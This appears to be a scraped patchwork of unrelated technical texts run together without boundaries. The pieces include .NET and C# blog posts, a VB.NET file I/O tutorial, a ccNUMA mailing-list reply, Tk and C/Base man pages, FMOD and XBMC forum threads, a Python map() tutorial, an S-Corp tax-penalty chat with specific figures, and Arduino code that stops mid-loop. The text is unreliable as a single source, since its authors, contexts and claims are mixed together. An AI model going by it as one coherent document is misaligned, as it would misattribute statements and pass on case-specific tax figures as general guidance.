After saving the data, the .Net process waits until it's instructed to do some more work. However, because a large amount of data has been promoted into Gen2, it just sits there until sufficient new allocations cause a Gen2 GC collection. The problem is that if no new work happens for a long time (hours), these unreachable objects take up (virtual) address space. Yes, NT will swap it out to disk as virtual memory. But it's still there.
The GC really needs a timer which periodically checks whether no GCs have happened recently and the process has consumed very little CPU, and then performs a Gen2 collection.
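A hypothetical sketch of that policy (the type and method names here are invented for illustration, and a real version would also check recent CPU usage):

using System;
using System.Threading;

static class IdleCollector
{
    private static Timer _timer;        // keep a reference so the timer survives
    private static int _lastGen2Count;

    public static void Start(TimeSpan interval)
    {
        _lastGen2Count = GC.CollectionCount(2);
        _timer = new Timer(_ =>
        {
            int gen2Now = GC.CollectionCount(2);
            if (gen2Now == _lastGen2Count)
            {
                // No Gen2 collection since the last check: assume the process
                // is idle and collect so promoted garbage is swept out.
                GC.Collect();
            }
            _lastGen2Count = GC.CollectionCount(2);
        }, null, interval, interval);
    }
}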
Aside: Does anyone know how to trigger a GC.Collect() on a process from a different process, or from inside WinDbg? One of the problems with WinDbg/SOS is figuring out just which objects are reachable - you would have to !gcroot every possible object just to figure out which are the reachable ones.
[Screenshot: a mangled Windows error dialog]
Why does Microsoft insist on making my life difficult?
I'm doing a lot of porting and refactoring at the moment. I've come to the conclusion that porting from a dynamically typed language to a statically typed language is an order of magnitude more difficult than doing the reverse.
Refactoring is an interesting game. There are some very easy refactorings - especially with the toolsets available to us nowadays. However, there are some extremely difficult refactorings. I've found the most difficult to refactor methods have one or more of these 3 aspects:
1) It has long methods (>40 lines)
2) The method shares a variable for different things
3) Loops do more than one thing

1) causes 2) - so eliminating 1) means that 2) doesn't happen.
I sure wish the NextBigLanguage had an upper bound on the lines/method it can parse.
A lot of my development is done with Code Smells. Whether I'm working on my own code or refactoring someone elses code, if I see some code and it smells funny, then I investigate further.
Recently I've come to realize there's a code smell which we can blame Microsoft (Anders) for! C# Code Regions.
Back in the early days of .Net (ie 2000-2003), I used to moderately region my code. But since reading Martin Fowler's seminal Refactoring book where the concept of Code Smells was introduced, I found that I didn't need C# Regions.
So why are regions a Code Smell?
There are two types of regioning I've seen in code. Regions that group methods, properties, member variables, constructors etc together, and those which collapse a block of code. I'll deal with each separately.
Using Regions to group members.
In many companies, its commonplace (and even enforced practice) to group similar class members together and place a region block around them. I've even seen this as a coding doctrine inside Microsoft. The problem is that Visual Studio already has a facility to do this automatically. And it's been around in VS since it was called VJ++ and before that in VC. It's called the Class View window, accessed with the shift-ctrl-C shortcut. So why anyone would care about building a class "DOM" into their code using Regions, rather than rely on the Class View window I have no idea. Perhaps they're using Notepad?
Using Regions to hide blocks within a method.
This is when it gets really nasty. Not only is a long method itself a Code Smell, but having region after region after region is a sure-fire way of telling you the method is too long.
So, please, can we all resolve to stop using Regions?
Interestingly, there are many features that Java has started copying from C# - but regions were not one of those. Perhaps in C# v4 Microsoft can right the wrong and deprecate regions?
If you're making a SOAP request (in this case with the SOAP toolkit), and you get:
"WSDLReader:Loading of the WSDL file failed HRESULT=0x80070057: The parameter is incorrect."
during the MSSoapInit() call, check that you haven't added a cache-control:no-cache custom header to IIS, or that HttpExpires isn't set to zero days.
A couple of months ago I came across a very clever Sudoku solver written by Peter Norvig. Peter had written the solver using Python. The solver was special as it solved by constraint propagation using list comprehensions and generator expressions making it extremely fast and very memory frugal. It turns out that the new LINQ feature of C# v3 is basically list comprehensions and generator expressions by another name.
Brendan Eich, the creator of JavaScript had ported the original Python implementation to JavaScript and I thought it would be a good idea to try to port it to C# v3. You can check out the code here.
I always had a vague plan to wrap the solver in a Silverlight front-end for added WOW factor, but it never really materialized. Fast forward two months and David Anson posts a Silverlight-based Sudoku game on his blog. This gave me the perfect excuse to integrate the LINQ-based solver into his codebase. I extended David's code to respond to the Escape key and complete the board with the first solution found. You can play with it online here, or download the code here. Have fun!
To solve a game, give the Silverlight board the input focus and hit the escape key.
So I'm sat here watching the Mix07 keynote, 45 minutes after Ray Ozzie first got to the stage. I download the Silverlight Beta for Mac and install it.
Firefox has crashed 4 times while trying to view the Silverlight demos on microsoft.com/silverlight. This is getting really frustrating trying to review the new features.
As has been blogged all over the place, WPF/E has been renamed Silverlight (Note: lower case 'L').
Some people say there's more to come at MIX07. Well, I think I've discovered what the secret is. It's hidden inside of the Silverlight promo video. Silverlight is written in Java! Don't believe me? Take a look at a frame grab from the promo video, clearly showing Silverlight's use of SAX, the javax namespace and use of Java API's like vector.addElement.
In this video, Peter Hallam, one of the original C# designers talks about a new C# v3 feature, but also says that WinForms was the original consumer of the C# language.
This totally contradicts my understanding. I thought that ASP.Net (XSP) was the original team using C# and that WinForms (WFC as it was) was only ported to C# from Java over the winter of 1999/2000 by Chris Anderson.
Am I wrong?
Read and write text files with Visual Basic .NET
Takeaway: Reading and writing text files is an essential task in any programming language. Follow this step-by-step approach to working with text files in VB .NET using the System.IO namespace.
Years ago, when I first learned to program in BASIC, I came across a sample program for reading a text file. The OPEN command with the file number looked quite confusing, so I never wrote the program. Later, when I learned Visual Basic, I was shocked to see that the same file operations existed in VB. The basic file-handling commands had not changed; just a few more features had been added.
With Visual Basic .NET, Microsoft introduced a new, object-oriented method for working with files. The System.IO namespace in the .NET framework provides several classes for working with text files, binary files, directories, and byte streams. I will look specifically at working with text files using classes from the System.IO namespace.
Basic methods
Before we jump into working with text files, we need to create a new file or open an existing one. That requires the System.IO.File class. This class contains methods for many common file operations, including copying, deleting, file attribute manipulation, and file existence. For our text file work, we will use the CreateText and OpenText methods.
CreateText
True to its name, the CreateText method creates a text file and returns a System.IO.StreamWriter object. With the StreamWriter object, you can then write to the file. The following code demonstrates how to create a text file:
Dim oFile as System.IO.File
Dim oWrite as System.IO.StreamWriter
oWrite = oFile.CreateText("C:\sample.txt")
OpenText

The OpenText method opens an existing text file for reading and returns a System.IO.StreamReader object. The following code demonstrates how to open a text file:

Dim oRead as System.IO.StreamReader
oRead = oFile.OpenText("C:\sample.txt")
Writing to a text file
The methods in the System.IO.StreamWriter class for writing to the text file are Write and WriteLine. The difference between these methods is that the WriteLine method appends a newline character at the end of the line while the Write method does not. Both of these methods are overloaded to write various data types and to write formatted text to the file. The following example demonstrates how to use the WriteLine method:
oWrite.WriteLine("Write a line to the file")
oWrite.WriteLine() 'Write a blank line to the file
Formatting the output
The Write and WriteLine methods both support formatting of text during output. The ability to format the output has been significantly improved over previous versions of Visual Basic. There are several overloaded methods for producing formatted text. Let’s look at one of these methods:
oWrite.WriteLine("{0,10}{1,10}{2,25}", "Date", "Time", "Price")
oWrite.WriteLine("{0,10:dd MMMM}{0,10:hh:mm tt}{1,25:C}", Now(), 13455.33)
oWrite.Close()
The overloaded method used in these examples accepts a string to be formatted and then a parameter array of values to be used in the formatted string. Let’s look at both lines more carefully.
The first line writes a header for our report. Notice the first string in this line is {0,10}{1,10}{2,25}. Each curly brace set consists of two numbers. The first number is the index of the item to be displayed in the parameter array. (Notice that the parameter array is zero based.) The second number represents the size of the field in which the parameter will be printed. Alignment of the field can also be defined; positive values are right aligned and negative values are left aligned.
The second line demonstrates how to format values of various data types. The first field is defined as {0,10:dd MMMM}. This will output today’s date (retrieved using the Now() function) in the format 02 July. The second field will output the current time formatted as 02:15 PM. The third field will format the value 13455.33 into the currency format as defined on the local machine. So if the local machine were set for U.S. Dollars, the value would be formatted as $13,455.33.
Listing A shows the output of our sample code.
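Listing A is not reproduced here; assuming the code ran at 2:15 PM on 2 July on a machine set for U.S. Dollars, the output would look roughly like this, with each field right aligned in its width:

      Date      Time                    Price
   02 July  02:15 PM               $13,455.33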
Reading from a text file
The System.IO.StreamReader class supports several methods for reading text files and offers a way of determining whether you are at the end of the file that's different from previous versions of Visual Basic.
Line-by-line
Reading a text file line-by-line is straightforward. We can read each line with a ReadLine method. To determine whether we have reached the end of the file, we call the Peek method of the StreamReader object. The Peek method reads the next character in the file without changing the place that we are currently reading. If we have reached the end of the file, Peek returns -1. Listing B provides an example for reading a file line-by-line until the end of the file.
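Listing B is not shown here; a minimal sketch of the loop it describes might look like this (the file name is an assumption):

Dim oRead As System.IO.StreamReader
Dim LineIn As String
oRead = System.IO.File.OpenText("C:\sample.txt")
While oRead.Peek() <> -1
    'Read one line and echo it to the console
    LineIn = oRead.ReadLine()
    Console.WriteLine(LineIn)
End While
oRead.Close()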
An entire file
You can also read an entire text file from the current position to the end of the file by using the ReadToEnd method, as shown in the following code snippet:
Dim EntireFile As String
oRead = oFile.OpenText("C:\sample.txt")
EntireFile = oRead.ReadToEnd()
This example reads the file into the variable EntireFile. Since reading an entire file can mean reading a large amount of data, be sure that the string can handle that much data.
One character at a time
If you need to read the file a character at a time, you can use the Read method. This method returns the integer character value of each character read. Listing C demonstrates how to use the Read method.
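Listing C is likewise not shown; a sketch of the character-at-a-time version might be (file name again assumed):

Dim oRead As System.IO.StreamReader
Dim CharIn As Integer
oRead = System.IO.File.OpenText("C:\sample.txt")
While oRead.Peek() <> -1
    'Read returns the integer character value of each character
    CharIn = oRead.Read()
    Console.Write(Chr(CharIn))
End While
oRead.Close()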
Tap into the power
We've barely scratched the surface of the new file functionality included in .NET, but at least you have an idea of the power now available in the latest edition of Visual Basic .NET. The abilities of the classes in the System.IO namespace are quite useful, but if you want to continue to use the traditional Visual Basic file operations, those are still supported.
More .NET
What types of .NET content would you like to see? Post your suggestions below or e-mail us with your suggestions.
Guys,

I am the maintainer of SCI, the ccNUMA technology standard. I know a lot about programming models. There are also a lot of tough issues for dealing with failed nodes, and how you recover when people's memory is all over the place across a bunch of machines. SCI scales better in ccNUMA, and all NUMA technologies scale very well when they are used with "Explicit Coherence" instead of "Implicit Coherence", which is what you get with SMP systems. Years of research by Dr. Justin Rattner at Intel's high performance labs demonstrated that shared-nothing models scaled into the thousands of nodes, while all these shared-everything "Super SMP" approaches generally hit the wall at 64 processors.

SCI is the fastest shared-nothing interface out there, and it can also do ccNUMA. Sequent, Sun, DG and a host of other NUMA providers use Dolphin's SCI technology and have for years. ccNUMA is useful for applications that still assume a shared-nothing approach but that use the ccNUMA and NUMA capabilities for better optimization.

Forget trying to recreate the COMA architecture of Kendall Square. The name was truly descriptive of what happened in this architecture when a node fails -- it goes into a "COMA". I have lived through this whole discussion before, and you will find that ccNUMA is virtually unimplementable on most general purpose OSs. And yes, there are a lot of products and software out there, but when you look under the cover (like ServerNet) you discover their coherence models for the most part rely on push/pull explicit coherence models.

My 2 cents.

Jeff

On Thu, Dec 06, 2001 at 12:09:32AM -0800, David S. Miller wrote:
> From: Larry McVoy <lm@bitmover.com>
> Date: Thu, 6 Dec 2001 00:02:16 -0800
>
>     Err, Dave, that's *exactly* the point of the ccCluster stuff. You get
>     all that separation for every data structure for free. Think about
>     it a bit. Aren't you going to feel a little bit stupid if you do all
>     this work, one object at a time, and someone can come along and do the
>     whole OS in one swoop? Yeah, I'm spouting crap, it isn't that easy,
>     but it is much easier than the route you are taking.
>
> How does ccClusters avoid the file system namespace locking issues?
> How do all the OS nodes see a consistent FS tree?
>
> All the talk is about the "magic filesystem, thread it as much as you
> want" and I'm telling you that is the fundamental problem, the
> filesystem name space locking.
I've been running a crawler in Scrapy to crawl a large site I'd rather not mention. I use the tutorial spider as a template, then I created a series of starting requests and let it crawl from there, using something like this:
def start_requests(self):
    f = open('zipcodes.csv', 'r')
    lines = f.readlines()
    for line in lines:
        zipcode = int(line)
        yield self.make_requests_from_url("" % zipcode)
To start, there are over 10,000 such pages; then each of those queues up a pretty large directory, from which there are several more pages to queue, etc., and scrapy appears to like to stay "shallow," accumulating requests waiting in memory instead of delving through them and then back up.
The result of this is a repetitive big exception that ends like this:
File "C:\Python27\lib\site-packages\scrapy\utils\defer.py", line 57, in <genexpr> work = (callable(elem, *args, **named) for elem in iterable) --- <exception caught here> --- File "C:\Python27\lib\site-packages\scrapy\utils\defer.py", line 96, in iter_errback yield next(it)
..... (Many more lines) .....
File "C:\Python27\lib\site-packages\scrapy\selector\lxmldocument.py", line 13, in _factory body = response.body_as_unicode().strip().encode('utf8') or '<html/>' exceptions.MemoryError:
Fairly quickly, within an hour or so of a crawl that should take several days, the python executable balloons to 1.8 gigs and Scrapy won't function anymore (continuing to cost me many wasted dollars in proxy usage fees!).
Is there any way to get Scrapy to dequeue or externalize or iterate over (I don't even know the right words) stored requests to prevent such a memory problem?
(I'm not very proficient in programming, other than to piece together what I see here or in the docs, so I'm not equipped to troubleshoot under the hood, so to speak - I also was unable to install the full python/django/scrapy as 64-bit on W7, after days of trying and reading.)
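One pointer worth noting for the same problem: Scrapy's documented JOBDIR setting persists the scheduler's pending requests in disk queues instead of keeping them all in memory, which is the "externalize" behaviour asked about above (the spider name and directory here are placeholders):

scrapy crawl myspider -s JOBDIR=crawls/myspider-1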
NAME
Tk_MeasureChars, Tk_TextWidth, Tk_DrawChars, Tk_UnderlineChars - routines to measure and display simple single-line strings.

SYNOPSIS
#include <tk.h>
int
Tk_MeasureChars(tkfont, string, numBytes, maxPixels, flags, lengthPtr)
int
Tk_TextWidth(tkfont, string, numBytes)
void
Tk_DrawChars(display, drawable, gc, tkfont, string, numBytes, x, y)
void
Tk_UnderlineChars(display, drawable, gc, tkfont, string, x, y, firstByte, lastByte)

ARGUMENTS

int numBytes (in)
    The maximum number of bytes to consider when measuring or drawing string. Must be greater than or equal to 0.

int maxPixels (in)
    If maxPixels is >= 0, it specifies the longest permissible line length in pixels. Characters from string are processed only until this many pixels have been covered. If maxPixels is < 0, then the line length is unbounded and the flags argument is ignored.

int flags (in)
    Various flag bits OR-ed together: TK_PARTIAL_OK means include a character as long as any part of it fits in the length given by maxPixels; otherwise, a character must fit completely to be considered. TK_WHOLE_WORDS means stop on a word boundary, if possible. If TK_AT_LEAST_ONE is set and not even one word fits on the line, the first few letters of the word that do fit are returned; if not even one letter of the word fit, then the first letter will still be returned.

int *lengthPtr (out)
    Filled with the number of pixels occupied by the number of characters returned as the result of Tk_MeasureChars.

Display *display (in)
    Display on which to draw.

Drawable drawable (in)
    Window or pixmap in which to draw.

GC gc (in)
    Graphics context for drawing characters. The font selected into this GC must be the same as the tkfont.

int x, y (in)
    Coordinates at which to place the left edge of the baseline when displaying string.

int firstByte (in)
    The index of the first byte of the first character to underline in the string. Underlining begins at the left edge of this character.

int lastByte (in)
    The index of the first byte of the last character up to which the underline will be drawn. The character specified by lastByte will not itself be underlined.

Characters such as tabs, newlines/returns, and control characters that have no displayable glyph are measured and displayed by these procedures in a backslashed escape form.
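A minimal sketch of how these routines combine (the font, GC and window setup are assumed to exist elsewhere; the 100-pixel limit and TK_PARTIAL_OK are arbitrary choices for illustration):

#include <string.h>
#include <tk.h>

/* Draw only as much of a string as fits in 100 pixels. */
static void
DrawClipped(Display *display, Drawable drawable, GC gc, Tk_Font tkfont,
        int x, int y)
{
    const char *string = "Hello, world";
    int lengthInPixels;

    /* How many bytes of string fit in 100 pixels? */
    int numBytes = Tk_MeasureChars(tkfont, string, strlen(string),
            100, TK_PARTIAL_OK, &lengthInPixels);

    /* Draw only the bytes that fit. */
    Tk_DrawChars(display, drawable, gc, tkfont, string, numBytes, x, y);
}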
Tk 8.1 Tk_MeasureChars(3)
NAME
ttyinit, ttyrestore, erasechar, killchar - initialize and restore terminal for I/O
SYNOPSIS
#include <cbase/escape.h>
ttyinit()
ttyrestore()
int erasechar()
int intrchar()
int killchar()
DESCRIPTION
The ttyinit function initializes escape(C-3) and getkey for terminal input and output. The TERM environment variable must contain the name of a terminal in the terminal definition file. The value of TERM is used to access the terminal definition file, if the terminal definition file is used. This can be done by the following command:
set TERM=terminaltype
Ttyinit reads the terminal definition named by TERM. If there is no environment variable TERM, ttyinit returns -1. If the terminal named by the TERM name is not defined, ttyinit returns 0 (zero). Ttyinit returns 1 on success. Any program using getkey, escape or termparm must first call ttyinit to determine that there is a valid terminal type defined. If there is a valid terminal definition file, it is loaded into program memory and used for all calls to escape, getkey, and termparm.
Normally input is read from the keyboard one line at a time. The ttyinit function sets the terminal driver so that characters can be read when they are typed rather than waiting until the RETURN key is pressed. The ttyinit function also disables character echoing, so it is the responsibility of the program calling ttyinit to echo typed characters.
The ttyrestore function restores the terminal state as it was before ttyinit was called. The first time the ttyinit function is called, it saves the current terminal state before it changes it, and ttyrestore uses this to reset the terminal.
The erasechar function returns the character that is typed when a character should be erased. The killchar function returns the character that is typed when a line should be erased. The ttyinit function disables character erasing and line killing that is normally performed. These functions are used to determine what characters are typed to erase a character or erase a line, so that they can be simulated by the program using ttyinit.
The intrchar function returns the character that is typed to interrupt the process. Ttyinit does not disable interrupt characters.
The functions ttyinit and ttyrestore are not utilized in the MS-DOS version.
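A minimal sketch of the usual call sequence (a hypothetical program; it assumes a valid TERM setting and the cbase headers and libraries):

#include <cbase/escape.h>

int main()
{
    if (ttyinit() != 1)    /* 1 = success, 0 = unknown terminal, -1 = no TERM */
        return 1;
    /* ... read characters as they are typed, echoing them yourself and
       comparing against erasechar(), killchar() and intrchar() ... */
    ttyrestore();          /* restore the saved terminal driver state */
    return 0;
}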
SEE ALSO
escape(C-3), termparm(C-3)
C/Base Reference Manual Chapter 2, Terminal Independent I/O
C/Base Reference Manual Chapter 11, Creating Terminal Definitions
Hi !
I’m a newb to programming with Fmod.
I’m using VS 2005 and C++.
I downloaded the latest FMOD, installed it, and put the libs and includes into my VS folders.
This is my code
[code:2j06aazd]
#include <iostream>
#include <fmod.hpp>
#include <fmod_output.h>

using namespace std;

char a;

int main () {
#pragma comment(lib,"fmodexL_vc.lib")
    FSOUND_STREAM * stream = NULL;
    FSOUND_SetOutput(FSOUND_OUTPUT_DSOUND);
    stream = FSOUND_Stream_Open("fall.ogg", FSOUND_LOOP_NORMAL, 0, 0);
    FSOUND_Stream_Play(FSOUND_FREE, stream);
    cout << "Press any key to exit " << endl;
    cin >> a;
    FSOUND_Stream_Stop(stream);
    FSOUND_Close();
    return 0;
}
[/code:2j06aazd]
My VS 2005 is getting me numerous "Undeclared identifier" and "Identifier not found " errors.
Can someone help me?
Thanks.
- ReiKo asked 11 years ago
Did you download Fmod or FmodEx… because they are two different APIs and your API usage doesn’t look correct for FmodEx
- byteasc answered 11 years ago
Fmodex
Now I downloaded FMOD3 and tried to use the simple load-and-play-sound example, but I get these errors:
[code:2429bfqs]
mod.obj : error LNK2019: unresolved external symbol _FMUSIC_LoadSong@4 referenced in function _main
fmod.obj : error LNK2019: unresolved external symbol _FSOUND_Init@12 referenced in function _main
[/code:2429bfqs]
and this is my code :
[code:2429bfqs]
#include <iostream>
#include <fmod.h>
using namespace std;
char a;
int main () {
FSOUND_Init(44100, 32, 0);
FMUSIC_MODULE *mu = NULL;
mu = FMUSIC_LoadSong("canyon.mid");
FMUSIC_PlaySong(mu);
cout << "Press any key to exit" << endl;
cin >> a;
return 0;
}
[/code:2429bfqs]
thank you.
Are you actually linking it into your project? Just make sure in your linker settings the correct library is linked. Just having it in a folder doesn't make it link.
Your first post was using fmod3 commands with fmod ex. That wouldn't even compile. Just look at an existing fmod example.
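For what it's worth, one way to link without touching the project settings at all is the pragma already used in the first snippet; the library name has to match the .lib that ships with your FMOD3 SDK, so treat the name below as an assumption:

[code]
// ask the MSVC linker to pull in the FMOD3 import library
#pragma comment(lib, "fmodvc.lib")
[/code]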
- brett answered 11 years ago
Actually I don't know how to link that lib in VS2005; I know how to link it in DEVC++ but not in VS2005.
Will try to find it on net though.
Problem solved, thanks & lock.
<job name="Job Name" expression="* * * * *" command="XBMCCommand()" show_notification="true/false" />
from cron import CronManager, CronJob
manager = CronManager()
#get jobs
jobs = manager.getJobs()
#delete a job
manager.deleteJob(job.id)
#add a job
job = CronJob()
job.name = "name"
job.command = "Shutdown"
job.expression = "0 0 * * *"
job.show_notification = "false"
manager.addJob(job)
#Please be aware that adding or removing a job will change the job list (and change job ids) so please refresh your job list each time by using:
jobs = manager.getJobs()
#This will also pull in any new jobs that may have been added via other methods
<job name="Job Name" minute="*" hour="*" day="*" month="*" weekday="*" command="XBMCCommand()" show_notification="true/false" />
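For example, a hypothetical job that shuts the machine down at 3:00 every morning would look like this (the name and values are illustrative only):

<job name="Nightly shutdown" minute="0" hour="3" day="*" month="*" weekday="*" command="Shutdown" show_notification="false" />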
robweber Wrote:@HansMayer
My intent with this was to have the GUI be good enough that the format of the xml file was something the user will never see. Since I couldn't finish the GUI this code is released as is in the hopes of getting some people interested. I would not try submitting this to the xbmc repo for users at large like this.
Having the user interface have options for minute, second, etc would work. The power of cron is really what drives this so I wouldn't want to make it too simple and lose that.
HansMayer Wrote:I don't understand. What exact functionality would be lost if you would divide the options to make the arguments more obvious? You could still use hour="*/1" and stuff like that.
(2012-04-03 03:54)backspace Wrote: I think this needs to be finished by some of the skilled skinners out there
I keep breaking xbmc trying different playlist options etc
Anyone out there keen to finish the GUI?
(2012-11-01 21:51)backspace Wrote: Is there a way to make this clear the music play list before timing another?
Also still hoping that someone jumps in and finishes the GUI (please)
Python's map() is a built-in function that executes a specified function on all the elements of an iterable and returns a map object (an iterator) for retrieving the results. Each element is sent to the function as a parameter. The iterable can be, for example, a list, a tuple, a string, etc., and map() returns an iterable map object.
Syntax of map function in python
The syntax for the map() function is as follows:

Syntax: map(function, iterable[, iterable1, iterable2,.., iterableN])
Parameters:
• Function: A mandatory function that will be applied to all the elements of the given iterable.
• Iterable: The object whose elements are to be mapped. It could be a list, a tuple, and so on. Many iterable objects may be passed to the map() function.
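Because several iterables may be passed, the mapped function takes one argument per iterable. A small illustrative sketch (the variable names are just placeholders):

# map() with two iterables: the lambda receives one element from each
a = [1, 2, 3]
b = [10, 20, 30]
print(list(map(lambda x, y: x + y, a, b)))  # prints [11, 22, 33]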
Return Value
The map() function applies a given function to every element of an iterable and returns an iterable map object, which can be converted to a tuple, a list, etc.
Python map() example
Let's write a function to be used with the map() function.
# function to square the value passed to it
def square(x):
    return x * x
It’s a simple function that returns the square of the input object.
# creating a list
my_list = [1, 2, 3, 4, 5]
result = map(square, my_list)
# print a list containing the squared values
print(list(result))
The map() function takes the square function and the my_list iterable. Each element in my_list is passed by map() to the square function. Converting the map object with list() and printing it shows the squared elements: [1, 4, 9, 16, 25].
Python map() Function Example Using a Lambda Function
The first argument to map() is a function, which is applied to each element. For each element of the iterable, Python calls the function once and adds the manipulated element to the map object.

The syntax of map() with a lambda function is as follows:

map(lambda argument(s): expression, iterable)
We may implement a lambda function for a list like the one below, with an expression we would like to apply to each object in the list:

n = [5, 10, 15, 20, 25, 30]
We may use map() and lambda to apply an expression to each of our numbers:

mapped = list(map(lambda x: x * x, n))
Here each element of the list is bound to x and multiplied by itself. We pass our number list as the map() iterable.
We print a listing of the map object to get the results immediately:
print(mapped)
Complete Program and output:
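The complete program simply collects the lines above, and its output is the list of squares:

n = [5, 10, 15, 20, 25, 30]
mapped = list(map(lambda x: x * x, n))
print(mapped)

Output:

[25, 100, 225, 400, 625, 900]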
A poly-line primitive, a connected group of line segments. More...
#include <polyline.h>
Inherits jbt_primitive.
List of all members.
There is a fair amount of re-computation going on in this class. At some point it should be re-visited and sped up a bit.
Note that at this time using any distance metric besides Euclidean (the default) is not supported. The results are undefined. To make it work with other metrics, we need to compute a basis for the query point which is similar to the basis used for computing the u coordinate of elemental parameterization.
Construct a new poly line. Pass the points for the line segments, the number of points and two radii.
Returns the number of points in the polyline.
Gets the position of the ith point.
Hi - I can help here
....
What you'll need to do is prepare the 1120-S, prepare the W-2 and pay yourself a reasonable salary, and then have the rest flow through the K-1 to you as an individual
Have you prepared your personal return for those years?
Yes, you can and should ... after a period (typically three years), unless you've dissolved the corp and filed a final 1120-S, they hit you with a non-filing penalty (regardless of income)
Hang with me here and let me give you a bit of foundation
The S-Corp is a pass through (you likely know this) and the profits after your wage and the other s-corp expenses flow to you on a K-1
Makes a lot of sense, very reasonable
You can buy prior year copies of Turbotax here... that might make this much easier:
No, again until you file that 1120-S with the final return box they'll expect filings
let me estimate that for you... you'll have to bear with me a minute
perfect, yes
OK, on the wages, I used 85000, filing as single standard deduction generates a tax liability of 14,469 ... Total penalty and interest for non-filing and nonpayment is $21,876.06
that's 2012
$1,322.00 of interest on the tax, taking it to $15,791.00,
$3,255.53 failure to file plus $297.45 interest, totaling $3,552.98
Failure to pay $2,532.08 ... totaling $21,876.06 overall ($15,791.00 + $3,552.98 + $2,532.08)
no it changes ... do you have an estimate of tax liability?
Yes, but something they will waive under something called FTA (First Time Abatement) if you have a clean compliance history for the previous three years, or POTENTIALLY under reasonable cause
[sometimes]
Taxpayers can request relief from failure-to-file, failure-to-pay, and failure-to-deposit penalties in three ways, depending on their situation:
sorry looks like we crossed there let me read
Yes, it's the profit that matters ... the dollars became taxable once you have the kind of profit you had ... the physical distribution of them isn't a taxable event
What you're doing now is going back and reporting it (in tax terminology, getting into compliance)
The K-1 can SHOW distributions but you didn't have any ... What the K1 WILL show that's taxable is line 1 income
....
The 1120-S has gross receipts (your commissions, whatever), then expenses (your wages, automobile, business meals and entertainment, advertising, etc); THAT number that's left is what gets taxed to you on the K-1 (flows to the front of the 1040)
Yep
hang on and I'll estimate those for 2012
Failure to file $2,340 (AND remember we didn't include the $45,000 that would flow to you on the first estimate of personal taxes,
distributions are not taxable events
the tax is based on (1) Wages and (2) profits (over and above the wages and other expenses)
to tax the distributions of profit in a pass through after they've already been taxed at the K-1 level would be taxing them twice
That's right, it's essentially a dividend (called distributive share of profits)
One of the biggest problems out there with S-Corps and investors (not shareholder employees) is when they have to pay tax on their portion of profits from a K-1 but the controlling owners don't distribute them any money to pay the taxes WITH
Understand ... was just trying to help you understand how it works ... the distributions only lower your tax BASIS but are not taxable
And not paying Social Security and medicare taxes (not PAID on that K-1 share) is exactly the reason FOR the required salary
It's very possible if you are clean (as described above) ... but would only apply to the first year
that's right ... it's the 1/2 that you withhold and pay from wages and the matching 1/2 that the S-Corp (you, here) pays that's analogous to Self-employment tax for a self-employed individual (a very specific term in taxation)
Just don't show the withholding and yes there will be tax and then with no withholding against it the tax is not reduced by the withholding
If I were you I'd use all of the deductions that would be available to you ... in real estate it's COMPLETELY expected that you'd have expenses (auto, lunches, maybe an office rent, advertising, etc) to reduce that 45,000
Could actually get it down low enough that you could take the salary down and still have it seen as reasonable
Yes, those are expenses of the company ... here's what the expense section of the 1120-S looks like
7  Compensation of officers (see instructions—attach Form 1125-E)
8  Salaries and wages (less employment credits)
9  Repairs and maintenance
10 Bad debts
11 Rents
12 Taxes and licenses
13 Interest
14 Depreciation not claimed on Form 1125-A or elsewhere on return (attach Form 4562)
15 Depletion (Do not deduct oil and gas depletion.)
16 Advertising
17 Pension, profit-sharing, etc., plans
18 Employee benefit programs
19 Other deductions (attach statement)
20 Total deductions. Add lines 7 through 19
sorry, the formatting didn't transfer well ... but as you can see you're expected to have expenses ... You could always use Form 2106, Unreimbursed Employee Expenses, but that would be contrived (making it harder than simply showing the expenses of your S-Corp)
LOTS of theories (rules of thumb) out there on that one ... IRS won't speak to it and says that it's a "facts and circumstances" question ... essentially you should look at what you would be paid to do the same thing as an employee
That's a part of your S-Corp's gross receipts ... OR if they gave you the 1099 based on your social and in your name ... then you'll report that on Schedule C
Expenses for that will go on the Schedule C ... or, again, if the 1099 was to your S-Corp (not likely, there's an exception for 1099s to corporations), in the S-Corp expenses
Would you like to do a phone consult ... LOTS of stuff here ... we're getting close, but a call would likely be much more efficient ... We can do what's called an "additional services offer" here where we're given a private/encrypted link to exchange phone and/or email ... I can do this for a small amount (say $9) BUT would need to wait until about 3:00; I have another call scheduled for 2:15 (eastern time here)
OK I've answered both of these ... since the S-Corp doesn't PAY taxes there's just the non-filing fee ... it was something like 2300 for the 2012
And on the other one:
Taxpayers can request relief from failure-to-file, failure-to-pay, and failure-to-deposit penalties in three ways, depending on their situation:
2340
And on what your turbotax will do I'm not sure how sophisticated it is (I use an intuit professional program with my clients)
Listen ...I'd be glad to continue here OR do the phone consult ... but will need to step away for a bit for 2:15 conference call
If this HAS helped, and you DON’T have other questions … I'd really appreciate a positive rating (using the rating request, faces, or stars on your screen)
That's the only way I'll be credited for the work here.
But we can also pick back up on this a little later (either way)
still with me?
Hi,
I’m just checking back in to see how things are going.
Did my answer help?
Let me know…
Thanks
Lane
…
I based the code below on an example from the arduino site:
#include <SPI.h>
#include <Ethernet.h>
#include <TextFinder.h>

int treatPin = 9; // The pin the transistor is connected to

// Enter a MAC address and IP address for your controller below.
// The IP address will be dependent on your local network:
byte mac[] = { 0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xE4 };
byte ip[] = { 192,168,0,228 }; // change this

EthernetClient client;

// change this to your own twitter hashtag, or follow arduino ;-)
// (no leading '#' here: the %23 in the GET request below already encodes it)
char TwitterHashtag[] = "candy4greg";
char tweet[140] = "", oldTweet[140] = "";
char serverName[] = "search.twitter.com"; // twitter URL

void setup() {
  pinMode(treatPin, OUTPUT);
  // initialize serial:
  Serial.begin(9600);
  if(!Ethernet.begin(mac))
    Ethernet.begin(mac, ip);
  // connect to Twitter:
  delay(3000);
  for(int i = 0; i < 140; i++) {
    oldTweet[i] = 0;
    tweet[i] = 0;
  }
}

void loop() {
  int i;
  Serial.println("connecting to server...");
  if (client.connect(serverName, 80)) {
    TextFinder finder(client, 2);
    Serial.println("making HTTP request...");
    // make HTTP GET request to twitter:
    client.print("GET /search.atom?q=%23");
    client.print(TwitterHashtag);
    client.println("&count=1 HTTP/1.1");
    client.println("HOST: search.twitter.com");
    client.println();
    Serial.println("sent HTTP request...");
    while (client.connected()) {
      if (client.available()) {
        Serial.println("looking for tweet...");
        if(finder.find("<published>") && (finder.getString("<title>","</title>",tweet,140) != 0)) {
          // compare with the tweet from the previous check
          for(i = 0; i < 140; i++)
            if(oldTweet[i] != tweet[i])
              break;
          if(i != 140) {  // the tweet changed, so dispense a treat
            Serial.println(tweet);
            feedKids();
            for(i = 0; i < 140; i++)
